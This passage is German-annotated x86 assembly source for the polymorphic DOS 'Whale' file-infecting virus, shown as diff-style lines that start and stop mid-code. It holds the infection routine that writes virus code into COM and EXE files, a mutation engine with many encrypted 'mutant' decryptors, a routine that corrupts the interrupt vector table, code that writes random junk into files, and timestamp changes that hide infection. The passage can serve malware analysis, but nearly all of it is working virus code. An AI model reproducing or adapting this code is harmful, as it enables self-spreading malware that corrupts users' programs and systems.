DS:[FileSize+2],DX ; FileSize merken + MOV Word Ptr DS:[FileSize ],AX + + MOV DI,AX ; BEISPIEL : AX=9273 -> DI=9273 + ADD AX,000Fh ; AX=9282 + ADC DX,+00h ; bertrag nach DX + AND AX,0FFF0h ; AX=9280 + SUB DI,AX ; DI=FFF3 + MOV CX,0010h ; CX=10 + DIV CX ; AX=928 = Anzahl Paras fr File + MOV SI,AX ; SI=928 + MCODE 57 + RETN +;===================================================================== +;=====================================================( Infektion )=== +;===================================================================== +Infect_File: MDECODE 58 +;***************************************** +JMP CODE_58 ;************************* e-i-n-g-e-f--g-t- +;***************************************** + + XOR CX,CX + MOV AX,4200h ; SEEK File-Anfang + MOV DX,CX ; CX=DX=0 + CALL CS:[@INT21] ; INT 21h + + MOV CL,1Ch ; 1C Byte + MOV AH,40h ; Write to File + + MOV DX,Offset CodBuf ; EXE-Header / COM-Start + CALL CS:[@INT21] ; INT 21h + + MOV AX,0010h + MUL SI ; AX = AX * maxparas + MOV CX,DX ; DX = Offset CodBuf + MOV DX,AX ; + MOV AX,4200h ; SEEK from start to CX:DX + CALL CS:[@INT21] ; INT 21h + + MOV CX,Offset CodBuf ; CX = CodBuf + XOR DX,DX ; DX = 0 + ADD CX,DI ; CX = Offset CodBuf+DI + + MOV AH,40h ; WRITE-FILE + + CALL Mutate_Whale ; Mutieren + + CALL @10_Prozent ; jedes 10. Mal Wal + ; zerstren + CALL Suche_Fish ; Jedes 4. Mal FISH.TBL + ; schreiben + + MOV BYTE Ptr DS:[InfectFlag],01h ; "habe infiziert" + MOV BYTE Ptr DS:[D2433],01h ; Verschlsseln, schreiben, + ; entschlsseln ! + + PUSH BX + PUSH ES + + PUSH CS + POP ES + + MOV Word Ptr DS:[D2579],SI + + MOV SI,OFFSET J0491A - Offset VirStart + ;----------------------------------------------------- + ;----------------------------( Wal-Code zerstren )--- + ;----------------------------------------------------- + MOV BYTE Ptr DS:[SwapCode_5],0CCh ; 3259 , 0e8h + MOV BYTE Ptr DS:[SwapCode_2],0C6h ; 3A20 , 0e9h + MOV BYTE Ptr DS:[SWAPCODE_6],0CCh ; 2cff , 0c3h + ;----------------------------------------------------- + CALL Kill_Int_Table ; nur eine einzige Infektion +Code_58: MCODE 58 ; pro Session ! +;===================================================================== +;============================================( Zerstren des Wals )=== +;===================================================================== + CALL PATCH ; gepatchten code + ; zerstren + MOV SI,SWAPCODE_4 + XOR WORD Ptr DS:[SI],0EF15h ; PATCH zerstren + ADD SI,+02h + XOR WORD Ptr DS:[SI],4568h ; ---""----------- + MOV BYTE Ptr DS:[SwapCode_1],03Dh + ; DECODE zerstren + ;=====( eigentliche infektion )======================= + ;=========================; + CALL Code_Whale ; Whale kodieren ; + ; aber NICHT Lauffhig !! ; + ;=========================; + + ;-------------------------( und rckgngig machen )--- + MOV Byte Ptr DS:[SwapCode_1],0E9h + XOR WORD Ptr DS:[SI],4568h + SUB SI,+02h + XOR WORD Ptr DS:[SI],0EF15h + ADD SI,SwapCode_3 ; SI = 210Ah + CALL PATCH + ;===================================================== + MDECODE 59 + MOV SI,[D2579] + POP ES + POP BX + CALL Write_Trash_To_File + + MOV CX,WORD PTR DS:[FileTime] + + MOV AX,5701h ; SET FILEDATUM ! + MOV DX,WORD PTR DS:[FileDate] + TEST CH,80h ; Stunde > 16 ? + JNZ J038C3 ; jmp, wenn nicht + OR BYTE PTR CS:[TrashFlag],00h + JNZ J038C3 ; TrashFlag = "1" :jmp + ADD CH,80h ; Stunde=Stunde-16 +J038C3: CALL CS:[@INT21] ; Set Filedatum +CODE_59: + MCODE 59 + RETN +;===================================================================== +;===========================( Den Whale-Code zerstren , bei der )=== +;===========================( Infektion jedes 10. COM-Files )=== +;===========================( Zweck : Geburtenkontrolle ! )=== +;===================================================================== +@10_Prozent: MDECODE 60 + CALL PushALL + MOV BYTE PTR CS:[TrashFlag],00h + OR BYTE Ptr CS:[Offset Exe_Flag-Offset VirStart],0 + JNZ J0390E ; Jmp, wenn EXE-File + + IN AL,40h + CMP AL,19h ; 90 % liegen ber 19h + JNB J0390E ; fertig, nichts weiter tun +;-------------------------------------( Wal zerstrt seinen Code )--- + INC BYTE PTR CS:[TrashFlag]; ist jetzt "1" + MOV BX,000Ah + MOV CX,0016h + +J038F4: IN AL,40h + MOV CS:[BX],AL ; 16h Byte von CS:281A..2830 + INC BX ; durch Zufallszahlen berschreiben + LOOP J038F4 + IN AL,40h + MOV BYTE PTR CS:[0001h],AL ; dito den JMP bei CS:2811 + IN AL,40h + MOV BYTE PTR CS:[0002h],AL + IN AL,40h + MOV BYTE PTR CS:[0003h],AL + +J0390E: CALL PopALL + MCODE 60 + RETN +;---------------------------------------------------- +J03916: DB 0E9H,09Dh,0F2H ;JMP J02BB6 => Nirwana +;-------------------------------------------------------------------- +;------------------------------------------------------( Hmmmmm ) --- +;-------------------------------------------------------------------- +J03919: ; JZ J03916 ; => Nirwana ! + MOV DX,DS ; DX <- DS + POP AX ; AX = 20h + ADD DX,+10h ; DX = DS:100 + MOV DS,DX ; DS = DX + MOV BX,[BX] ; BX:=0030:011C, DAS IST DER + NEG BX ; TASTATURPUFFER ( 40:1C) ! + ADD BX,CX ; es testet den Tastaturpuffer +;******************************************************************** + CMP BX,BX ;**** EINGEFGT ************* +;******************************************************************** + JNZ J03936 ; dann direkt in die Dekode-Routine + ; mit SI als Returnadresse + JZ J03990 ; sonst "decode" scharfmachen + ;-------------------------------------------------( trash )--- + DW 00A72h + DW 00B73H + DW 0FEE9H + DW 0E9F2h + DW 43H + ;------------------------------------------------------------- +J03936: JMP J02B87 ; = push si, jmp decode + +;--------------------------------------------------------------------- + DB 0e9h,06dh,0ah,0e9h,0a4h,0fch +;===================================================================== +;========================================( Schreibt Mll in Datei )=== +;===================================================================== +Write_Trash_To_File: + MDECODE 61 + CALL PushALL + OR BYTE PTR CS:[TrashFlag],00h + JZ J0396A ; falls "0" nichts tun + + XOR AX,AX + IN AL,40h + MOV DS,AX + + MOV DX,0400h ; DX = 400h + + IN AL,40h + XCHG AH,AL + IN AL,40h + MOV CX,AX + AND CH,0Fh ; CX = 0xxxh + MOV AH,40h ; WRITE File + + CALL CS:[@INT21] + +J0396A: CALL PopALL + MCODE 61 + RETN +;---------------------------------------------------------( trash )--- + DB 0b9h,01ch,000h,089H + DB 0d7h,0B3h,000h,0e8H +;========================================================()=========== +J0397A: MDECODE 62 + CALL SaveRegisters + MOV DI,DX + ADD DI,+0Dh + PUSH DS + POP ES + MCODE 62 + JMP J039EC ; ist die Datei ausfhrbar ? +;===================================================================== +;===========================================( Decode scharfmachen )=== +;===================================================================== +J03990: MOV BYTE PTR CS:[SI+SwapCode_1],0E9h; JMP erzeugen + JMP J03A1C + DB 0EAh +;===================================================================== +;======================================( zerstrt die INT-Tabelle )=== +;===================================================================== +Kill_Int_Table: + MDECODE 63 + CALL PushALL + MOV BX,23F1h ; 4C01 + MOV CX,000Eh ; CX = 0Eh + PUSH AX + MOV AX,0000h + MOV ES,AX ; ES = 0000 + POP AX + +J039AF: IN AX,40h ; Hole zufallszahl + MOV SI,AX + PUSH ES:[SI] ; zerstoere INT-Tabelle + POP [BX] ; durch 14 Zufalls-Werte ! + INC BX ; Die in [bx] gemerkt werden + LOOP J039AF + CALL PopALL + MCODE 63 + RETN +;===================================================================== +;===================================( check auf ausfhrbare Datei )=== +;===================================================================== +J039C3: MDECODE 64 + CALL SaveRegisters + PUSH DS + POP ES + MOV CX,0050h + MOV DI,DX + MOV BL,00h + XOR AX,AX + CMP BYTE Ptr DS:[DI+01h],':' ; Laufwerk im Filenamen ? + JNZ J039E1 + MOV BL,[DI] ; Ja, dann Buchstabe nach BL + AND BL,1Fh ; HEX-ZAHL drausmachen +J039E1: MOV CS:[D2428],BL ; und in die DRIVE-Variable + REPNZ SCASB ; ENDE des Filenamens suchen + MCODE 64 +;--------------------------------------------------------------------- +;---------------------------------( Erkennung der Datei-Extension )--- +;--------------------------------------------------------------------- +J039EC: MDECODE 65 + MOV AX,[DI-03h] ; ENDE - 3, ist EXTENSION + AND AX,0DFDFh ; Gross-Schrift + ADD AH,AL + MOV AL,[DI-04h] + AND AL,0DFh ; Gross-schrift + ADD AL,AH + MOV BYTE PTR CS:[EXE_FLAG],00h +;--------------------------------------------------------------------- +;------------( Angenommen, es war ein COM, dann gilt : )------------- +;------------( AND AX,0DFDF : AX = 4D4F / 'MO' )------------- +;------------( ADD AH,AL : AX = 9C4F )------------- +;------------( MOV AL,[Di-4]: AX = 9C43 / 'xC' )------------- +;------------( ADD AL,AH ; AX = 9CDF )------------- +;--------------------------------------------------------------------- +;------------( BEI EXE kommt AL=E2 heraus, bei COM AL=DF)------------- +;--------------------------------------------------------------------- + CMP AL,0DFh ; Also : IST ES EIN COM ? + MCODE 65 +J03A0C: JZ J03A17 + INC BYTE PTR CS:[EXE_FLAG] + CMP AL,0E2h ; Also : IST ES EIN EXE ? + JNZ J03A23 ; Weder COM noch EXE +J03A17: CALL GetRegsFromVirstack ; COM oder EXE + CLC ; Carry-Flag lschen + RETN +;===================================================================== +;====================================( JMP wird zeitweise erzeugt )=== +;====================================( Einziger JMP zum Relokator )=== +;===================================================================== +J03A1C: XOR AX,AX + PUSH ES + POP DS +J03A20: JMP Relokator +;===================================================================== +J03A23: CALL GetRegsFromVirstack ; Weder COM noch EXE +J03A26: STC ; Carry-Flag setzen + RETN + DB 2Dh +;===================================================================== +;===============================================( Get current PSP )=== +;===================================================================== +GET_Current_PSP:MDECODE 66 + PUSH BX + MOV AH,51h + CALL CS:[@INT21] + MOV CS:[@PSP],BX + POP BX + MCODE 66 + RETN +;===================================================================== +;==========================(--------------------------------------)=== +;==========================( HIER ENTSTEHEN DIE MUTANTEN ! )=== +;==========================(--------------------------------------)=== +;===================================================================== +Mutate_Whale: MDECODE 67 + CALL PushALL ; AH = 40h ! + OR BYTE PTR CS:[InfectFlag],00h ; Hab schon infiziert ! + JNZ J03A7C + + IN AL,40h ; Zufallszahl holen + CMP AL,80h ; nur jedes 2 Mal arbeiten + +J03A55: JB J03A7C + CALL Decode_3A84 ; Bereich 3A84h...436Ch + +J03A5A: IN AL,40h ; Zufallszahl holen + CMP AL,1Eh ; kleiner als 1eh / 30d + JNB J03A5A + + XOR AH,AH + MOV BX,M_SIZE + MUL BX ; Zufallszahl * 4Ch / 76d + ; AX : 0000....08E8 + ADD AX,Offset J03A84-Offset VirStart + ; AX : 1274....1B5C + + PUSH CS + PUSH CS + POP DS + POP ES ; ES=DS=CS + + ;====================== + MOV SI,AX ; Quelle : 1274....1B5C + ; bzw. 3A84....436C + ; in Stcken zu 4Ch !!! + ;====================== + MOV DI,Offset D4BB5-Offset VirStart + MOV CX,M_SIZE ; 4C Byte von CS:SI + ; nach CS:23A5/4BB5 + ; schaufeln + CLD + REPZ MOVSB + CALL Code_3A84 ; Bereich 3A84h...436Ch + +J03A7C: CALL PopALL + MCODE 67 + RETN + +;=================================( dieser Code steht immer davor )=== +;Code_Whale: PUSH CX +; PUSH BX +; MOV BX,FirstByte +; MOV CX,Code_len ; 2385h ; Wal-Size bis J04BB5 +;===================================================================== +; Die Nummerierung der Mutanten folgt dem TBSCAN.DAT-File +;===================================================================== +;=====================================================( MUTANT # 3)=== +;===================================================================== +MUT_3 EQU $ +J03A84: STD ; = OFFSET 4BB5 + MOV CX,DreiByte ; 0BD8h +J03A88: XOR WORD Ptr DS:[BX],1326h + ADD BX,+03h + LOOP J03A88 + + MOV CX,BX + POP CX + MOV BX,CX + POP CX + MOV AH,60h + JMP SHORT J03AB8 + ;--------( einsprung ) ---------( -1131 )------------ +J03A9B: PUSH SI ; = 4BCC, SI = 100h + CALL J03AA1 ; + + DW 6945h ; 4BD0 + +J03AA1: POP DX ; DX = 4BD0 + PUSH CS + SUB DX,23A0H ; DX = 2830 + + POP DS + MOV CX,DreiByte ; CX = 0BD8 + XCHG DX,SI ; DX = 100h, SI = 2830 +J03AAD: XOR WORD Ptr DS:[SI],1326h + ADD SI,+03h + LOOP J03AAD + JMP SHORT J03AC0 ; SI = 4BB8 + ;---------------------------------------------------- +J03AB8: SUB AH,20h ; => AH = 40, WRITE FILE + ;----------------( db-code )------------------------- + Call_int21 3,MUT_3 + ;---------------- + JMP J03A9B + ;---------------------------------------------------- +J03AC0: SUB SI,Offset D4BB5-4C40H ; SI = SI + 8Bh = 4C43h/D2433 + CMP BYTE Ptr DS:[SI],01h + JNZ J03ACB + POP SI ; originales SI vom Stack + RETN + +J03ACB: PUSH ES + POP DS + ;---------------- +J03ACD: JMP_entry 3,mut_3 + ;---------------- +;===================================================================== +;=====================================================( MUTANT #5 )=== +;===================================================================== +MUT_5 EQU $ +J03AD0: MOV CX,0BD7h ; CX = 0bd7 ; = OFFSET 4BB5 +J03AD3: XOR WORD Ptr DS:[BX],4096h ; also 11c3 mal, da BX um 3 + ; erhht wird + ADD BX,+03h + LOOP J03AD3 + MOV AX,ES + POP AX + MOV BX,AX + POP CX + MOV AH,50h + JMP SHORT J03B04 + +J03AE6: PUSH SI + ;--------( einsprung ) ------ +J03AE7: STD + CALL J03AED + PUSH CS + DEC DI +J03AED: POP DX ; DX = + PUSH CS + SUB DX,23A0h ; DX = + POP DS + MOV CX,0BD7h ; CX = + XCHG DX,SI ; SI = + +J03AF9: XOR WORD Ptr DS:[SI],4096h + ADD SI,+03h + LOOP J03AF9 + JMP SHORT J03B0C ; SI = + + +J03B04: SUB AH,10h ; AH = 40h ! + CALL_INT21 5,MUT_5 + JMP J03AE6 + +J03B0C: SUB SI,0FF72h ; SI = + CMP BYTE Ptr DS:[SI],01h + JNZ J03B17 + POP SI + RETN + +J03B17: PUSH ES + POP DS +J03B18: JMP_ENTRY 5,mut_5 +;===================================================================== +;===================================================( MUTANT # 20 )=== +;===================================================================== +MUT_20 EQU $ + CMC ; = OFFSET 4BB5 + CALL J03B61 ; CX = 11C3 +J03B20: XOR WORD Ptr DS:[BX],0406h + INC BX + ADD BX,+01h + CMC + LOOP J03B20 + POP BX + CMC + POP CX + CALL_INT21 20,MUT_20 + PUSH AX + POP AX + ;--------( einsprung ) ------ + CALL J03B5E ; DS <- 4BCF + + MOV BX,CS + PUSH BX + MOV BX,DS ; BX <- DS, BX = 4BCF ! + POP DS ; DS=CS + ADD BX,0DC61h ; BX = 2830 + CALL J03B61 ; CX = 11C3 + MOV DX,0002h ; DX = 2 +J03B46: XOR WORD Ptr DS:[BX],0406h + ADD BX,DX + LOOP J03B46 + ; BX = 4BB6 + ADD BX,008Dh ; BX = 4C43 / 2443 + PUSH [BX] ; [BX]=[2443] ???????? + POP CX ; CX = ? + DEC CL ; CX = ? + JZ J03B60 ; + PUSH ES + POP DS + CALL_ENTRY 20,mut_20 + +J03B5E: POP DS + PUSH DS +J03B60: RETN + +J03B61: MOV CX,1100h + OR CL,0C3h ; CX = 11C3 + RETN +;===================================================================== +;===================================================( MUTANT # 21 )=== +;===================================================================== +MUT_21 EQU $ + CALL J03BAE ; CX = 11C3 +J03B6B: XOR WORD Ptr DS:[BX],239Ah + ADD BX,+01h + CLC + INC BX + LOOP J03B6B + + POP BX + CLD + POP CX + CALL_INT21 21,MUT_21 + PUSH DX + INC DX + POP DX + ;--------( einsprung ) ------ + CALL J03BAB ; DS <- 4BCF + MOV BX,CS + PUSH BX + MOV BX,DS ; BX = 4BCF + POP DS ; DS = CS + ADD BX,0DC61h ; BX = 2830 + CALL J03BAE ; CX = 11C3 + MOV AX,0002h ; AX = 0002 + +J03B92: XOR WORD Ptr DS:[BX],239Ah + NOP + ADD BX,AX + LOOP J03B92 + + ADD BX,008Dh ; BX = 4BB6 + PUSH [BX] + POP BX + DEC BL ; CMP byte Ptr DS:[4C43],1 + JZ J03BAD + PUSH ES + POP DS + CALL_ENTRY 21,mut_21 + ;------------------- +J03BAB: POP DS + PUSH DS +J03BAD: RETN + +J03BAE: MOV CX,0C311h ; MOV CX,11C3 + XCHG CH,CL ; RET + RETN +;===================================================================== +;===================================================( MUTANT # 22 )=== +;===================================================================== +MUT_22 EQU $ + CALL J03BF9 ; CX = 11C3 +J03BB7: XOR WORD Ptr DS:[BX],0138h + ADD BX,+02h + LOOP J03BB7 + POP BX + CLC + POP CX + CALL_INT21 22,MUT_22 + JMP SHORT J03BCB + + DB 23h,87h,0ch + ;--------( einsprung ) ------ +J03BCB: CALL J03BF6 ; DS <- + + MOV BX,CS + PUSH DS ; DS = CS + MOV DS,BX + POP BX ; BX = + SUB BX,239Fh ; BX = + CALL J03BF9 ; CX = 11C3 + MOV AX,0002h ; AX = 0002 + +J03BDE: XOR WORD Ptr DS:[BX],0138h + ADD BX,AX + LOOP J03BDE + ADD BX,008Dh ; BX = + PUSH [BX] + POP BX + DEC BL ; + JZ J03BF8 + PUSH ES + POP DS + JMP_ENTRY 22,mut_22 + +J03BF6: POP DS + PUSH DS +J03BF8: RETN + +J03BF9: MOV CX,0C311h ; MOV CX,11C3 + XCHG CL,CH ; RET + RETN + + DB 0CCh +;===================================================================== +;===================================================( MUTANT # 23 )=== +;===================================================================== +MUT_23 EQU $ + XCHG CL,CH ; = OFFSET 4BB5 + XOR CX,94E0h ; CX=2385 -> 8523 -> 11c3 +J03C06: INC BX + ADD WORD Ptr DS:[BX],00FEh + INC BX + LOOP J03C06 + MOV AX,DX + POP DX + MOV BX,DX + POP CX + PUSH AX + JMP SHORT J03C42 + + ;--------( einsprung ) ------ +J03C17: CALL J03C1B +J03C1A: RETN + +J03C1B: MOV BX,0DC61h ; BX = + POP CX ; CX = + ADD BX,CX ; BX = + PUSH CS + MOV CX,11C4h ; CX = + POP DS ; DS = + DEC CL ; CX = 11C3 +J03C28: INC BX + SUB WORD Ptr DS:[BX],00FEh + INC BX + LOOP J03C28 + PUSH SI ; BX = + MOV SI,BX ; SI = + ADD SI,008Dh ; SI = + DEC BYTE Ptr DS:[SI] ; + POP SI + JZ J03C1A + PUSH ES + CLC + POP DS + JMP_ENTRY 23,mut_23 + +J03C42: POP DX + MOV AL,40h + XCHG AH,AL ; AH = 40h !!!!!!! +J03C47: + CALL_INT21 23,MUT_23 + JMP J03C17 +END_23: +;===================================================================== +;===================================================( MUTANT # 27 )=== +;===================================================================== +MUT_27 EQU $ + SUB CH,12h ; = OFFSET 4BB5 + ADD CL,3Eh ; cx=2385 -> 11c3 +J03C52: ADD [BX],CX + ADD BX,+04h + SUB BX,+02h + LOOP J03C52 + XCHG BP,BX + POP BP + XCHG BX,BP + JMP SHORT J03C8D + + ;--------( einsprung ) ------ +J03C63: CALL J03C67 +J03C66: RETN + +J03C67: POP CX + MOV BX,0DC61h + ADD BX,CX + PUSH CS + MOV CX,10C3h + POP DS + INC CH +J03C74: SUB [BX],CX + INC BX + STC + INC BX + LOOP J03C74 + MOV BP,BX + ADD BP,008Dh + DEC BYTE PTR [BP+00h] + POP BP + JZ J03C66 + PUSH ES + POP DS + JMP_ENTRY 27,mut_27 + +J03C8D: POP CX + PUSH BP + MOV BP,2567h + INC BP + +J03C93: + + CALL DS:BP + JMP J03C63 +;===================================================================== +;===================================================( MUTANT # 24 )=== +;===================================================================== +Mut_24 EQU $ + ADD CX,0EE3Eh ; = OFFSET 4BB5 + JMP SHORT J03CA7 + db 43h +J03C9F: NEG WORD Ptr DS:[BX] + ADD BX,+02h + LOOP J03C9F +J03CA6: RETN + +J03CA7: CALL J03C9F + CALL J03CCE + + DB 0EAH + DB 12H + + ;--------( einsprung ) ------ +J03CAF: PUSH AX + CALL J03CDD + ADD DX,0DC60h + MOV CH,11h + MOV CL,0C3h + XCHG BX,CX + CALL J03C9F + TEST BYTE Ptr DS:[D2433],0FEh + JZ J03CA6 + MOV CX,ES + MOV DS,CX + CALL_ENTRY 24,mut_24 + ;------------------- +J03CCE: POP CX + POP AX + XCHG AX,BX + POP AX + XCHG AX,CX + MOV AH,3Fh + INC AH + CALL_INT21 24,mut_24 + POP AX + JMP J03CAF + +J03CDD: MOV BX,CS +J03CDF: MOV DS,BX + POP DX + PUSH DX + RETN +;===================================================================== +;====================================================( MUTANT # 28)=== +;===================================================================== +mut_28 EQU $ + XOR CX,3246h ; = OFFSET 4BB5 + JMP SHORT J03CF3 + +J03CEA: XOR [BX],CX + ADD BX,+03h + DEC BX + LOOP J03CEA +J03CF2: RETN + +J03CF3: CALL J03CEA + CALL J03D18 +J03CF9: XCHG BL,BH + ;--------( einsprung ) ------ + CALL J03D29 + XCHG DX,BX + ADD BX,0DC61h + MOV CX,ZweiByte + CALL J03CEA + TEST BYTE Ptr DS:[D2433],0FEh + JZ J03CF2 + MOV DX,ES + MOV DS,DX + JMP_ENTRY 28,mut_28 + +J03D18: POP AX + POP AX + MOV BX,AX + POP AX + MOV CX,AX + XOR AH,AH + OR AH,40h ; AH = 40h + CALL_INT21 28,mut_28 + JMP J03CF9 + +J03D29: MOV BX,CS +J03D2B: MOV DS,BX + POP DX + PUSH DX + RETN +;===================================================================== +;====================================================( MUTANT # 26)=== +;===================================================================== +mut_26 EQU $ + SUB BX,+02h ; = OFFSET 4BB5 + ADD CX,0EE3Ch + MOV AX,[BX] +J03D39: INC BX + INC BX + SUB [BX],AX + LOOP J03D39 + POP BX + XLAT ; MOV AL,[BX+AL] + POP CX + JMP SHORT J03D6C + +J03D44: POP BX + PUSH BX +J03D46: RETN + + ;--------( einsprung ) ------ +J03D47: PUSH CS + POP DS + CALL J03D44 + ADD BX,0DC5Dh + MOV CX,11C1h + MOV AX,[BX] +J03D55: INC BX + INC BX + ADD [BX],AX + LOOP J03D55 + ADD BX,0092h + CMP BYTE Ptr DS:[BX+01h],01h + JZ J03D46 + PUSH ES + AND AX,CX + POP DS + CALL_ENTRY 26,mut_26 + ;------------------- +J03D6C: MOV AH,30h + ADD AH,10h + + PUSH SI + MOV SI,1466h + CALL [SI+1100h] ; CALL INT 21h + POP SI + JMP J03D47 + +;===================================================================== +;=====================================================( MUTANT #1 )=== +;===================================================================== +MUT_1 EQU $ + SUB CX,11C4h ; = OFFSET 4BB5 + SUB BX,+02h + MOV AX,[BX] +J03D85: INC BX + INC BX + SUB [BX],AX + LOOP J03D85 + POP BX + POP CX + JMP SHORT J03DB9 + +J03D8F: POP BX + CLD + PUSH BX +J03D92: RETN + ;--------( einsprung ) ------ +J03D93: PUSH CS + POP DS + CALL J03D8F ; BX = +J03D98: SUB BX,23A3h ; BX = + MOV CX,11C1h ; CX = + MOV DX,[BX] +J03DA1: INC BX + INC BX + ADD [BX],DX + LOOP J03DA1 + PUSH BP + MOV BP,0433h + CMP BYTE PTR [BP+2000h],01h ; [2433] + POP BP + JZ J03D92 ; AUSGANG ! + PUSH ES + POP DS + CALL_ENTRY 1,mut_1 + ;----------------- +J03DB9: MOV AH,20h + ADD AH,AH ; AH = 40h => Schreiben !!!!!! + + MOV BP,2466h + CALL CS:[BP+0100h] ; CALL Int 21h ! + JMP J03D93 + DB 89H + +;===================================================================== +;====================================================( MUTANT #17 )=== +;===================================================================== +MUT_17 EQU $ + xor ax,ax ; = OFFSET 4BB5 + ADD CX,BX +J03DCC: MOV AL,[BX] + SUB [BX-01],AL + SUB BX,+02h + CMP BX,+1Fh + JNZ J03DCC + POP BX + CLD + POP CX + CALL J03E04 ; = JMP 3E04 + ;--------( einsprung ) ------ +J03DDF: PUSH CS + STD + POP DS + POP AX ; AX = + CALL J03E11 ; AX = + XCHG AX,BX ; BX = + MOV CX,ZweiByte ; CX = + SUB BX,+1Eh ; BX = + +J03DED: MOV DL,[BX] + ADD [BX-01h],DL + DEC BX ; (!!!!!) + CMC + DEC BX + LOOP J03DED + ; BX = + CMP BYTE Ptr DS:[D2433],01h + JZ J03E13 + PUSH ES + CMC + POP DS + CALL_ENTRY 17,mut_17 + +J03E04: POP AX + XOR AH,AH + OR AH,40h ; AH = 40h, SCHREIBEN + + CALL DS:[@INT21] ; CALL INT 21h + CALL J03DDF +J03E11: POP AX + PUSH AX +J03E13: RETN +;===================================================================== +;====================================================( MUTANT # 16)=== +;===================================================================== +MUT_16 EQU $ + ADD BX,CX ; = OFFSET 4BB5 + MOV CX,0001h + INC CX ; CX = 2 +J03E1A: MOV AL,[BX] + ADD [BX-01h],AL + SUB BX,CX + CMP BX,+1Fh + JNZ J03E1A + POP BX + POP CX + CALL J03E4F + ;--------( einsprung ) ------ +J03E2B: POP BX ; BX = + PUSH CS + POP DS + CALL J03E5C ; AX = + + XCHG AX,BX ; AX = + SUB BX,+1Dh ; BX = + MOV CX,ZweiByte ; CX = + +J03E38: MOV AL,[BX] + SUB [BX-01h],AL + DEC BX + DEC BX + LOOP J03E38 + ; BX = + CMP BYTE Ptr DS:[D2433],01h + JZ J03E5E + PUSH ES + SUB AX,AX + POP DS + CALL_ENTRY 16,mut_16 +;---------------------------------------------------------------------- +J03E4F: POP AX + MOV AH,40h ; AH = 40h + + PUSH SI + MOV SI,Offset @INT21+2 ; Schreiben ? Int 21h ? +J03E56: CALL SI + POP SI + CALL J03E2B +J03E5C: POP AX + PUSH AX +J03E5E: RETN + DB 0ebh +;===================================================================== +;===================================================( MUTANT # 18 )=== +;===================================================================== +mut_18 EQU $ +J03E60: NOT BYTE Ptr DS:[BX] ; = OFFSET 4BB5 + NEG BYTE Ptr DS:[BX] + ADD BX,+01h + LOOP J03E60 + POP BX + CLD + POP CX + CALL_INT21 18,mut_18 + JMP SHORT J03E78 + +J03E71: MOV DX,CS + MOV DS,DX + CALL J03E7B + ;--------( einsprung ist $-1 )------- + ; ADD BH,DL + ; JMP J03E71 + ;------------------------------------- + +J03E78: XLAT ; MOV AL,[BX+AL] + JMP J03E71 + +J03E7B: POP DX ; DX = + SUB DX,239Dh ; DX = + STC + XCHG BX,DX ; BX = + MOV CX,CODE_LEN XOR 0F0FH ; CX = + CLC + XOR CX,0F0Fh ; CX = +J03E8B: NEG BYTE Ptr DS:[BX] + NOT BYTE Ptr DS:[BX] + INC BX + STD + LOOP J03E8B + ; BX = + MOV CH,8Dh ; CX = + MOV AL,01h + ADD AL,CH ; + XLAT ; MOV AL,[BX+AL] ; AL = [] + CLC + CMP AL,01h + JZ J03E56 ;-<<>>--< ZEIGT AUF L0L0L0 >-----<<>>-- + + MOV CX,ES + MOV AX,SS + + SUB AX,AX ; AX <- 0 + PUSH DS + MOV DS,CX ; DS <- ES + POP CX ; CX <- DS + JMP_ENTRY 18,mut_18 +;===================================================================== +;====================================================( MUTANT #30 )=== +;===================================================================== +Mut_30 EQU $ +J03EAC: NEG BYTE Ptr DS:[BX] ; = OFFSET 4BB5 + NOT BYTE Ptr DS:[BX] + INC BX + LOOP J03EAC + POP CX + POP BX + XCHG CX,BX + CALL_INT21 30,mut_30 + JMP SHORT J03EC3 + +J03EBC: MOV AX,CS + MOV DS,AX + CALL J03EC5 ; + ;-------( einsprung )-------------- +J03EC3: JMP J03EBC + +J03EC5: POP AX ; AX = + SUB AX,239Ch ; AX = + XCHG AX,BX ; BX = + + MOV CX,CODE_LEN XOR 0FDABH ; + XOR CX,0FDABh ; CX = 2385 + +J03ED1: NOT BYTE Ptr DS:[BX] + NEG BYTE Ptr DS:[BX] + INC BX + LOOP J03ED1 + ; BX = + MOV AL,8Eh + XLAT ; MOV AL,[BX+AL]; AL = [] + CMP AL,01h + JZ J03EF2 + MOV AX,ES + MOV BX,AX ; BX <- ES + PUSH DS + MOV DS,BX ; DS <- ES + POP BX ; BX <- DS + SUB AX,AX ; AX <- 0 + JMP_ENTRY 30,mut_30 + +;-------------------------------------------------------- + Dw 8903h,0A5EFh,0CC14H +J03EF2: RET + dw 0c111h,0b4deh +;===================================================================== +;=====================================================( MUTANT # 8)=== +;===================================================================== +mut_8 EQU $ + PUSH BP ; = OFFSET 4BB5 + INC BX + DEC CX + CALL J03F06 +J03EFE: DEC CX + NEG BYTE Ptr DS:[BX] + ADD BX,+02h + DEC CX +J03F05: RETN + +J03F06: POP BP ; BP = +J03F07: CALL J03EFE + JZ J03F3C + JMP J03F07 + +J03F0E: PUSH BP + ;-------( einsprung )-------------- + PUSH CS +J03F10: CLC + POP DS ; DS = CS + CALL J03F38 ; BP = OFFSET $+3 +J03F15: MOV CL,84h ; CX = xx84 + SUB BP,23A1h ; BP = 2831 + MOV BX,BP ; BX = 2831 + MOV CH,23h ; CX = 2384 +J03F1F: CALL J03EFE + JNZ J03F1F ; = LOOP 3F1F + + MOV AX,BP ; AX=BP=2831 + MOV BP,BX ; BX=4C00 + ADD BP,008Eh ; BP= + DEC BYTE PTR [BP+00h] ; + POP BP ; BP=egal + JZ J03F05 ; = RET + PUSH ES + POP DS + PUSH AX ; AX=2831 + MOV AX,CX ; AX = 0 +J03F38: POP BP ; BP=2831 + PUSH CS + PUSH BP + RETF ; JMP FAR CS:2830 + +J03F3C: POP BP + POP BX + POP CX + CALL_INT21 8,mut_8 + JMP J03F0E +;===================================================================== +;=====================================================( MUTANT #7 )=== +;===================================================================== +Mut_7 EQU $ + INC BX ; = OFFSET 4BB5 + PUSH DX + DEC CX +J03F47: CALL J03F52 +J03F4A: NOT BYTE Ptr DS:[BX] + DEC CX + ADD BX,+02h + DEC CX + RETN + +J03F52: POP DX +J03F53: CALL J03F4A + JZ J03F86 + JMP J03F53 + +J03F5A: PUSH DX + ;-------( einsprung )-------------- + PUSH CS +J03F5C: POP DS + CALL J03F83 ; DX = +J03F60: SUB DX,23A0h ; DX = + MOV BX,DX ; BX = + MOV CX,8423h + XCHG CL,CH ; CX = 2384 +J03F6B: CALL J03F4A + JNZ J03F6B ; LOOP + XCHG AX,DX ; AX = + MOV DX,BX ; BX = , DX = BX + ADD DX,008Eh ; DX = + XCHG DX,BX ; BX = , DX = + DEC BYTE Ptr DS:[BX] + POP DX ; DX = ???? + JZ J03F85 + PUSH ES + POP DS ; DS = ES + PUSH AX + 